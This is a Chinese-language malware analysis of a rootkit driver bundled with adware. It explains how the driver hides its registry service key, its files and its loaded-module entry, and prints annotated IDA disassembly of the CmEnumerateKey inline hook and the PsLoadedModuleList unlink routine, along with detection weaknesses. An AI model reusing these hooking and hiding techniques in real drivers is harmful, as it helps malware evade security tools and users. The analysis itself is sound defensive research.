u88财富快车流氓软件RK驱动分析


 BY mj0011

u88财富快车流氓软件RK驱动分析

RK部分一共三个文件
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
驱动部分是BOOT0的,主要干了这么些事:
1.建立CreateProcessNotifyRoutine,检测到userinit.exe加载后就修改注册表Run项目,以启动VideoAti0.exe,VideoAti0.exe启动后会删除自己的RUN项目,并注入VideoAti0.dll,导致启动后无法发现其启动项目

2.Hook CmEnumerateKey,隐藏VideoAti0.sys的服务项,IS,gmer,rku等无法检测到
通过CreateProcessNotifyRoutine检测到是如下进程调用CmEnumerateKey时,会恢复自己的HOOK,企图蒙混过关:D
fhs.exe,knlsc13.exe

3.Hook FSD Dispatch Routine,Hook了\FileSystem\Ntfs和\FileSystem\FastFat的IRP_MJ_CREATE和IRP_MJ_DIRECTORY_CONTROL,根据默认规则库会首先过滤
VideoAti0.sys
VideoAti0.dll
VideoAti0.exe
无法列出他们
规则库还可以通过R3向R0添加

4.从PsLoadedModuleList移除了自身,使得IS,gmer等工具无法检测到它,gmer可检测到 FSD HOOK,也检测不到是哪个module做了HOOK


后来R3的规则好像很BT,系统登录后加载任何位置的driver都会失败:D
分析后的idb文件见压缩包,和读源代码没什么区别了

摘点代码


 

.text:000112D4 ; ===========================================================================
.text:000112D4 ; NewCMEnumerateKey -- inline-hook replacement body for CmEnumerateKey.
.text:000112D4 ; stdcall, six dword args (retn 18h). The argument roles below follow the
.text:000112D4 ; CmEnumerateKey prototype (KeyControlBlock, Index, KeyInformationClass,
.text:000112D4 ; KeyInformation, Length, ResultLength); they are inferred from how the
.text:000112D4 ; values are used here, not stated on the page -- confirm against the SDK.
.text:000112D4 ;   arg_0  = key control block, passed through unchanged
.text:000112D4 ;   arg_4  = caller's Index; the slot is reused to hold the NTSTATUS result
.text:000112D4 ;   arg_8  = KeyInformationClass, passed through and never examined
.text:000112D4 ;   arg_C  = KeyInformation buffer (kept in ebx); name compared at [ebx+10h]
.text:000112D4 ;   arg_10 = Length, arg_14 = ResultLength, passed through unchanged
.text:000112D4 ; Globals: CmEnumerateKeyAddress = patched entry point; unk_14390 = the 6
.text:000112D4 ;   original bytes saved at hook time; dword_14374 = index skew (0 or 1) added
.text:000112D4 ;   to every Index; dword_1439C = first node of the hide list, HideReg = its
.text:000112D4 ;   terminator; each node holds a name pointer at [node-8], next at [node+4].
.text:000112D4 ; Flow: restore original bytes -> call original -> unless the caller is one of
.text:000112D4 ;   two named tools, compare the returned subkey name with the hide list ->
.text:000112D4 ;   on a hit set the skew and re-call with Index+1 -> re-patch -> return.
.text:000112D4 ; Analyst notes (artefacts a detector can use, all visible in this listing):
.text:000112D4 ;   * dword_14374 is one global, not per-caller or per-key: once set it shifts
.text:000112D4 ;     the Index of every CmEnumerateKey call from any process until some caller
.text:000112D4 ;     gets STATUS_NO_MORE_ENTRIES (8000001Ah), so unrelated keys can transiently
.text:000112D4 ;     appear to be missing an entry.
.text:000112D4 ;   * the entry point is left unpatched between 000112FF and 0001142A; raising
.text:000112D4 ;     IRQL only stops preemption on the current CPU, so on SMP a concurrent
.text:000112D4 ;     caller reaches the real CmEnumerateKey unfiltered.
.text:000112D4 ;   * the name is always read at offset 10h, i.e. the KEY_BASIC_INFORMATION
.text:000112D4 ;     layout, the compare is a prefix match of the pattern's length, and only
.text:000112D4 ;     one hidden entry is skipped per call (no loop after the second
.text:000112D4 ;     OldcmEnumerateKey); an enumeration using another information class, or
.text:000112D4 ;     two adjacent hidden keys, leaves the entry visible.
.text:000112D4 ; ===========================================================================
.text:000112D4 NewCMEnumerateKey proc near             ; DATA XREF: ReadyHardCodeAndHook+1DBo
.text:000112D4                                         ; NewCMEnumerateKey+14Co
.text:000112D4
.text:000112D4 var_24          = byte ptr -24h         ; caller image-name buffer, filled by GetCurrentCallProcess
.text:000112D4 NewIrql         = byte ptr -1           ; holds the IRQL in effect *before* the raise (name is misleading)
.text:000112D4 arg_0           = dword ptr  8
.text:000112D4 arg_4           = dword ptr  0Ch
.text:000112D4 arg_8           = dword ptr  10h
.text:000112D4 arg_C           = dword ptr  14h
.text:000112D4 arg_10          = dword ptr  18h
.text:000112D4 arg_14          = dword ptr  1Ch
.text:000112D4
.text:000112D4                 push    ebp
.text:000112D5                 mov     ebp, esp
.text:000112D7                 sub     esp, 24h
.text:000112DA                 push    ebx
.text:000112DB                 push    esi
.text:000112DC                 push    edi
.text:000112DD                 call    ds:KeRaiseIrqlToDpcLevel ; block preemption on this CPU only
.text:000112E3                 mov     [ebp+NewIrql], al ; al = previous IRQL, restored at 00011308
.text:000112E6                 call    WP_OFF          ; presumably clears CR0.WP; body not on this page
.text:000112E6
.text:000112EB                 pushf
.text:000112EC                 pusha
.text:000112ED                 lea     esi, unk_14390  ; src: the 6 saved original bytes
.text:000112F3                 mov     edi, CmEnumerateKeyAddress ; dst: the patched entry point
.text:000112F9                 mov     ecx, 6
.text:000112FE                 cld
.text:000112FF                 rep movsb               ; temporarily unhook so the call below does not recurse
.text:00011301                 popa
.text:00011302                 popf
.text:00011303                 call    WP_ON
.text:00011303
.text:00011308                 mov     cl, [ebp+NewIrql] ; restore the pre-raise IRQL
.text:0001130B                 call    ds:KfLowerIrql
.text:00011311                 push    [ebp+arg_14]    ; ResultLength
.text:00011314                 mov     ebx, [ebp+arg_C] ; ebx = KeyInformation, live until the end
.text:00011317                 mov     esi, [ebp+arg_4] ; esi = caller's Index
.text:0001131A                 push    [ebp+arg_10]    ; Length
.text:0001131D                 add     esi, dword_14374 ; esi += global skew (0 or 1)
.text:00011323                 push    ebx             ; KeyInformation
.text:00011324                 push    [ebp+arg_8]     ; KeyInformationClass
.text:00011327                 push    esi             ; skewed Index
.text:00011328                 push    [ebp+arg_0]     ; KeyControlBlock
.text:0001132B                 call    OldcmEnumerateKey ; original entry, currently unpatched
.text:00011331                 test    eax, eax
.text:00011333                 mov     [ebp+arg_4], eax ; arg_4 now holds the NTSTATUS to return
.text:00011336                 jge     short loc_11342 ; success: inspect the returned name
.text:00011336
.text:00011338                 cmp     eax, 8000001Ah  ; STATUS_NO_MORE_ENTRIES?
.text:0001133D                 jmp     loc_113FF       ; flags are consumed by the jnz at 000113FF
.text:0001133D
.text:00011342 ; ---------------------------------------------------------------------------
.text:00011342
.text:00011342 loc_11342:                              ; CODE XREF: NewCMEnumerateKey+62j
.text:00011342                 lea     eax, [ebp+var_24]
.text:00011345                 push    eax             ; char *
.text:00011346                 call    GetCurrentCallProcess ; fills var_24 with the calling image name; body not on this page
.text:00011346
.text:0001134B                 mov     edi, ds:_stricmp
.text:00011351                 lea     eax, [ebp+var_24]
.text:00011354                 push    offset s_Fhs_exe ; "fhs.exe"
.text:00011359                 push    eax             ; char *
.text:0001135A                 call    edi ; _stricmp
.text:0001135C                 pop     ecx
.text:0001135D                 test    eax, eax
.text:0001135F                 pop     ecx
.text:00011360                 jnz     short loc_1136D ; not fhs.exe -> try the second name
.text:00011360
.text:00011362                 lea     eax, [ebp+var_24]
.text:00011365                 push    eax
.text:00011366                 push    offset s_ProcessnameS ; "ProcessName:%S/n"
.text:0001136B                 jmp     short loc_11387 ; named tool: log and return the unfiltered result
.text:0001136B
.text:0001136D ; ---------------------------------------------------------------------------
.text:0001136D
.text:0001136D loc_1136D:                              ; CODE XREF: NewCMEnumerateKey+8Cj
.text:0001136D                 lea     eax, [ebp+var_24]
.text:00011370                 push    offset s_Knlsc13_exe ; "knlsc13.exe"
.text:00011375                 push    eax             ; char *
.text:00011376                 call    edi ; _stricmp
.text:00011378                 pop     ecx
.text:00011379                 test    eax, eax
.text:0001137B                 pop     ecx
.text:0001137C                 jnz     short loc_11390 ; neither name -> apply the hide list
.text:0001137C
.text:0001137E                 lea     eax, [ebp+var_24]
.text:00011381                 push    eax
.text:00011382                 push    offset s_Processname_0 ; "ProcessName:%S/n"
.text:00011382
.text:00011387
.text:00011387 loc_11387:                              ; CODE XREF: NewCMEnumerateKey+97j
.text:00011387                 call    DbgPrint        ; note: %S (wide) applied to the narrow var_24 buffer
.text:00011387
.text:0001138C                 pop     ecx
.text:0001138D                 pop     ecx
.text:0001138E                 jmp     short StopHook  ; skip filtering for these two tools
.text:0001138E
.text:00011390 ; ---------------------------------------------------------------------------
.text:00011390
.text:00011390 loc_11390:                              ; CODE XREF: NewCMEnumerateKey+A8j
.text:00011390                 mov     edi, dword_1439C ; edi = first hide-list node
.text:00011390
.text:00011396
.text:00011396 loc_11396:                              ; CODE XREF: NewCMEnumerateKey+EFj
.text:00011396                 cmp     edi, offset HideReg ; reached the list terminator?
.text:0001139C                 jz      short StopHook
.text:0001139C
.text:0001139E                 test    edi, edi        ; or a NULL link
.text:000113A0                 jz      short StopHook
.text:000113A0
.text:000113A2                 push    dword ptr [edi-8] ; wchar_t * (this node's name)
.text:000113A5                 call    ds:wcslen
.text:000113AB                 push    eax             ; size_t: only the pattern's length is compared (prefix match)
.text:000113AC                 lea     eax, [ebx+10h]  ; KeyInformation->Name, assuming KEY_BASIC_INFORMATION
.text:000113AF                 push    eax             ; wchar_t *
.text:000113B0                 push    dword ptr [edi-8] ; wchar_t *
.text:000113B3                 call    ds:_wcsnicmp
.text:000113B9                 add     esp, 10h
.text:000113BC                 test    eax, eax
.text:000113BE                 jz      short loc_113C5 ; match -> hide this entry
.text:000113BE
.text:000113C0                 mov     edi, [edi+4]    ; next node
.text:000113C3                 jmp     short loc_11396
.text:000113C3
.text:000113C5 ; ---------------------------------------------------------------------------
.text:000113C5
.text:000113C5 loc_113C5:                              ; CODE XREF: NewCMEnumerateKey+EAj
.text:000113C5                 push    dword ptr [edi-8]
.text:000113C8                 push    offset s_FoundHideregS ; "Found HideReg:%S/n"
.text:000113CD                 call    DbgPrint        ; debug output left in the release build: visible in a kernel debugger
.text:000113CD
.text:000113D2                 pop     ecx
.text:000113D3                 inc     esi             ; re-enumerate at Index+1
.text:000113D4                 pop     ecx
.text:000113D5                 mov     dword_14374, 1  ; remember the skew globally for later calls (see header)
.text:000113DF                 push    [ebp+arg_14]
.text:000113E2                 push    [ebp+arg_10]
.text:000113E5                 push    ebx
.text:000113E6                 push    [ebp+arg_8]
.text:000113E9                 push    esi
.text:000113EA                 push    [ebp+arg_0]
.text:000113ED                 call    OldcmEnumerateKey ; second call; its result is NOT re-checked against the list
.text:000113F3                 test    eax, eax
.text:000113F5                 mov     [ebp+arg_4], eax
.text:000113F8                 jge     short StopHook
.text:000113F8
.text:000113FA                 cmp     eax, 8000001Ah  ; STATUS_NO_MORE_ENTRIES?
.text:000113FA
.text:000113FF
.text:000113FF loc_113FF:                              ; CODE XREF: NewCMEnumerateKey+69j
.text:000113FF                 jnz     short StopHook  ; any other error: keep the skew
.text:000113FF
.text:00011401                 and     dword_14374, 0  ; end of enumeration: clear the skew
.text:00011401
.text:00011408
.text:00011408 StopHook:                               ; CODE XREF: NewCMEnumerateKey+BAj
.text:00011408                                         ; NewCMEnumerateKey+C8j
.text:00011408                                         ; NewCMEnumerateKey+CCj
.text:00011408                                         ; NewCMEnumerateKey+124j
.text:00011408                                         ; NewCMEnumerateKey:loc_113FFj
.text:00011408                 call    ds:KeRaiseIrqlToDpcLevel
.text:0001140E                 mov     [ebp+NewIrql], al
.text:00011411                 call    WP_OFF
.text:00011411
.text:00011416                 pusha                   ; (no pushf here, unlike the unhook path above)
.text:00011417                 mov     edi, CmEnumerateKeyAddress
.text:0001141D                 mov     al, 68h         ; re-patch: 68h imm32 = push NewCMEnumerateKey
.text:0001141F                 stosb
.text:00011420                 lea     eax, NewCMEnumerateKey
.text:00011426                 stosd
.text:00011427                 mov     al, 0C3h        ; C3h = ret; 6 bytes total, same size as unk_14390
.text:00011429                 stosb
.text:0001142A                 popa
.text:0001142B                 call    WP_ON
.text:0001142B
.text:00011430                 mov     cl, [ebp+NewIrql] ; restore the pre-raise IRQL
.text:00011433                 call    ds:KfLowerIrql
.text:00011439                 mov     eax, [ebp+arg_4] ; return the NTSTATUS saved from OldcmEnumerateKey
.text:0001143C                 pop     edi
.text:0001143D                 pop     esi
.text:0001143E                 pop     ebx
.text:0001143F                 leave
.text:00011440                 retn    18h             ; stdcall: pop the six dword arguments
.text:00011440
.text:00011440 NewCMEnumerateKey endp

 

 .text:00011794 ; ===========================================================================
.text:00011794 ; RemoveMyselfFormPsLoadModuleLIst -- walks the kernel loaded-module list and
.text:00011794 ; unlinks the first entry whose full path contains "videoati0" (the copy is
.text:00011794 ; lower-cased first, so the match is case-insensitive). No args, no result.
.text:00011794 ; Locals: var_208 = 208h-byte (104h wide-char) zeroed scratch copy of the path.
.text:00011794 ; Field offsets used (+0/+4 links, +20h, +24h, +28h) are consistent with
.text:00011794 ; KLDR_DATA_TABLE_ENTRY (InLoadOrderLinks, SizeOfImage, FullDllName.Length,
.text:00011794 ; FullDllName.Buffer) -- confirm against the target build's layout.
.text:00011794 ; Analyst notes (visible in this listing):
.text:00011794 ;   * only the Flink/Blink pair at +0/+4 is rewritten; the entry's memory and
.text:00011794 ;     any other list it is threaded on are untouched, so the module remains
.text:00011794 ;     discoverable by enumerations that do not go through this one list.
.text:00011794 ;   * the wcsncpy count is FullDllName.Length/2 with no bound against the
.text:00011794 ;     104h-wchar buffer: a long path overruns or un-terminates the stack copy.
.text:00011794 ;   * the walk starts at *PsLoadedModuleList (first entry) and stops when Flink
.text:00011794 ;     returns to it, so the list head itself is visited as if it were an entry,
.text:00011794 ;     guarded only by the SizeOfImage / MmIsAddressValid checks; nothing here
.text:00011794 ;     takes a lock around the walk or the unlink.
.text:00011794 ; ===========================================================================
 .text:00011794 RemoveMyselfFormPsLoadModuleLIst proc near ; CODE XREF: start:loc_1049Fp
.text:00011794
.text:00011794 var_208         = word ptr -208h        ; start of the 104h-wchar name buffer
.text:00011794
.text:00011794                 push    ebp
.text:00011795                 mov     ebp, esp
.text:00011797                 sub     esp, 208h
.text:0001179D                 and     [ebp+var_208], 0 ; zero the first wchar ...
.text:000117A5                 push    esi
.text:000117A6                 push    edi
.text:000117A7                 mov     ecx, 81h
.text:000117AC                 xor     eax, eax
.text:000117AE                 lea     edi, [ebp-206h]
.text:000117B4                 rep stosd               ; ... then 81h dwords + 1 word = the remaining 206h bytes
.text:000117B6                 stosw                   ; [ebp-208h, ebp) is now entirely zero
.text:000117B8                 mov     eax, PsLoadedModuleList ; exported pointer to the list head
.text:000117BD                 mov     edi, [eax]      ; edi = head->Flink = first entry; also the stop marker
.text:000117BF                 mov     esi, edi        ; esi = current entry
.text:000117BF
.text:000117C1
.text:000117C1 loc_117C1:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+88j
.text:000117C1                 cmp     dword ptr [esi+20h], 0 ; SizeOfImage == 0 -> skip this entry
.text:000117C5                 jz      short loc_11816
.text:000117C5
.text:000117C7                 push    dword ptr [esi+28h] ; VirtualAddress = FullDllName.Buffer (assumed layout)
.text:000117CA                 call    ds:MmIsAddressValid ; avoid faulting on an unmapped name buffer
.text:000117D0                 test    al, al
.text:000117D2                 jz      short loc_11816
.text:000117D2
.text:000117D4                 mov     eax, [esi+28h]
.text:000117D7                 test    eax, eax        ; NULL buffer -> skip
.text:000117D9                 jz      short loc_11816
.text:000117D9
.text:000117DB                 movzx   ecx, word ptr [esi+24h] ; FullDllName.Length in bytes
.text:000117DF                 shr     ecx, 1          ; -> wide-char count; never clamped to the buffer size
.text:000117E1                 push    ecx             ; size_t
.text:000117E2                 push    eax             ; wchar_t *
.text:000117E3                 lea     eax, [ebp+var_208]
.text:000117E9                 push    eax             ; wchar_t *
.text:000117EA                 call    ds:wcsncpy      ; copy the (not NUL-terminated) UNICODE_STRING body
.text:000117F0                 lea     eax, [ebp+var_208]
.text:000117F6                 push    eax             ; wchar_t *
.text:000117F7                 call    ds:_wcslwr      ; lower-case in place for the search below
.text:000117FD                 lea     eax, [ebp+var_208]
.text:00011803                 push    offset s_Videoati0 ; "videoati0"
.text:00011808                 push    eax             ; wchar_t *
.text:00011809                 call    ds:wcsstr       ; substring match anywhere in the path
.text:0001180F                 add     esp, 18h        ; cdecl cleanup for the three calls (6 dwords)
.text:00011812                 test    eax, eax
.text:00011814                 jnz     short loc_1181E ; found -> unlink
.text:00011814
.text:00011816
.text:00011816 loc_11816:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+31j
.text:00011816                                         ; RemoveMyselfFormPsLoadModuleLIst+3Ej
.text:00011816                                         ; RemoveMyselfFormPsLoadModuleLIst+45j
.text:00011816                 mov     esi, [esi]      ; esi = esi->Flink
.text:00011818                 cmp     esi, edi        ; wrapped around to the first entry?
.text:0001181A                 jz      short loc_11828 ; yes: not found, list left untouched
.text:0001181A
.text:0001181C                 jmp     short loc_117C1
.text:0001181C
.text:0001181E ; ---------------------------------------------------------------------------
.text:0001181E
.text:0001181E loc_1181E:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+80j
.text:0001181E                 mov     eax, [esi]      ; eax = entry->Flink
.text:00011820                 mov     esi, [esi+4]    ; esi = entry->Blink
.text:00011823                 mov     [eax+4], esi    ; Flink->Blink = Blink
.text:00011826                 mov     [esi], eax      ; Blink->Flink = Flink; the entry itself is not modified
.text:00011826
.text:00011828
.text:00011828 loc_11828:                              ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+86j
.text:00011828                 pop     edi
.text:00011829                 pop     esi
.text:0001182A                 leave
.text:0001182B                 retn
.text:0001182B
.text:0001182B RemoveMyselfFormPsLoadModuleLIst endp